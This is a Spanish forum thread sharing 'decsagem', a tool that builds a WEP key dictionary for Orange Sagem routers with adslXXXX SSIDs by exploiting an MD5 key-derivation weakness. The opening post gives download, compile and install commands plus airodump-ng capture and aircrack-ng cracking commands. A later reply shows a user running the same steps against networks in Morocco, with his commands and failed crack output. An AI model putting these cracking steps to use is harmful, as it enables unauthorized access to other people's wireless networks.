Seguridad Wireless - Wifi

Sistemas operativos => Zona GNU/Linux => Aplicaciones y diccionarios linux => Mensaje iniciado por: *dudux en 22-10-2008, 12:15 (Miércoles)

Título: adslXXXX Decsagem 0.1
Publicado por: *dudux en 22-10-2008, 12:15 (Miércoles)
Trabajo de ska1ix  
Version compilada para linux :  *dudux

Citar
He tenido acceso a un router Sagem F@ast 1500WG de Orange, y he visto que la clave WEP la generan a partir de un passphrase, compuesto por (por lo menos en el caso que yo he tenido entre manos) cuatro letras en minúscula más el número que aparece en el SSID. Es decir, parece que los SSID son adlsXXXX, donde XXXX son cuatro cifras, y el passphrase para generar la clave pienso que puede ser yyyyXXXX, donde yyyy son cuatro letras, supongo que en minúsculas y entre la a y la z, sin ñ ni caracteres especiales. A este passphrase le aplican el algoritmo MD5, lo que da la clave WEP en hexadecimal.

Si estoy en lo cierto, no es muy difícil reducir el campo de búsqueda de la clave, generando todas las combinaciones entre aaaaXXXX y zzzzXXXX, y aplicándole a cada posibilidad el algoritmo MD5. Por mis cálculos debería haber 26^4 posibilidades, más o menos medio millón, lo que reduce bastante el campo de búsqueda.

Bueno, pues he hecho un programilla en C, que funciona por lo menos para el caso al que tengo acceso directo, pero necesito voluntarios que verifiquen si estoy en lo cierto. El programa genera un archivo (¡17 megas!) con todas las claves posibles en formato hexadecimal y separadas cada pareja por dos puntos, para luego metérselo como diccionario al aircrack-ng.


    
 descarga decsagem (http://www.fileden.com/files/2008/10/11/2138272/decsagem0.1.tar.gz)

Instalacion
Código: [Seleccionar]
wget http://www.wifiway.org/archivos/decsagem0.1.tar.gz
tar zxvf decsagem0.1.tar.gz
gcc md5.c decsagem.c -o decsagem
cp decsagem /usr/bin
decsagem


Sinopsis
Código: [Seleccionar]
lenny:/home/dudu/wifi# decsagem

Uso: decsagem [-i] <numeroSSID> <clave>
   Autor: ska1ix   compilado por *dudux

      www.seguridadwireless.net

lenny:/home/dudu/wifi#





Uso  Minimo 4 ivs
Código: [Seleccionar]
airodump-ng -w adsl4566 -c 9 ath0
decsagem 4566
aircrack-ng -b 00:15:56:97:43:66 -w h:claves.txt adsl4566.cap

Para generar passphrase
Código: [Seleccionar]
decsagem -i 4566 CLAVE_WEP_MAYUSCULAS_SIN_PUNTOS





+info
http://foro.elhacker.net/hacking_wireless/testers_o_informantes_para_programa_que_saca_claves_wep_para_orange-t177204.0.html
https://foro.seguridadwireless.net/index.php/topic,5210.0.html
Título: Re: adslXXXX Decsagem 0.1
Publicado por: djtv en 07-03-2010, 19:25 (Domingo)
Muy buen aporte!!   >:( muchas gracias
Título: Re: adslXXXX Decsagem 0.1
Publicado por: new_user en 01-05-2011, 16:25 (Domingo)
Hola muchas gracias por este trabajo

os comento yo viajo mucho a marruecos y ayi creo que la compania mas famosa Maroc telecom (MENARA) usa el mismo router que el de orange fast 1500 wg ADSLXXXX mi pregunta es:

podria servir tambien para esas conexiones?

Título: Re: adslXXXX Decsagem 0.1
Publicado por: fluid en 01-05-2011, 16:54 (Domingo)
Si nadie lo confirma, ya tienes trabajo para la proxima vez que vayas  >:D

Saludos y gracias.

|FluiD|
Título: Re: adslXXXX Decsagem 0.1
Publicado por: new_user en 01-05-2011, 17:08 (Domingo)
lo hare aunque no merece la pena porque ayi todavia contratan 512kb y 1 mb total por curiosidad lo hare viajare la semana que viene luego os comento. gracias por contestar tan rapido.


este foro es genial :)
Título: Re: adslXXXX Decsagem 0.1
Publicado por: new_user en 30-05-2011, 15:53 (Lunes)
Hola de nuevo


ayer probe las adslxxxx de marruecos pero Resultado Negativo

hice lo siguientes pasos todo bien capture 50IVS llege a crear el el archivos claves pero al Auditar con aircrack-ng no da la contrasena pone que hay que probar con 5000 ivs?

aqui dejo los pasos

Código: [Seleccionar]
airodump-ng -w adsl3887 -c 1 mon0

decsagem 3887


aircrack-ng -b 00:19:70:43:4E:xx -w h:claves.txt adsl3887-01.cap

Aircrack-ng 1.1 r1860


Tested 167653 keys (got 50 IVs)


  Failed. Next try with 5000 IVs.


alguna sugerencia o es que el diccionario no es valido para las redes de aca

gracias
Título: Re: adslXXXX Decsagem 0.1
Publicado por: creacion10 en 29-07-2014, 17:26 (Martes)
A mí también me gustaría resolver esta cuestión. A ver si a alguien le ha pasado lo mismo y lo comenta.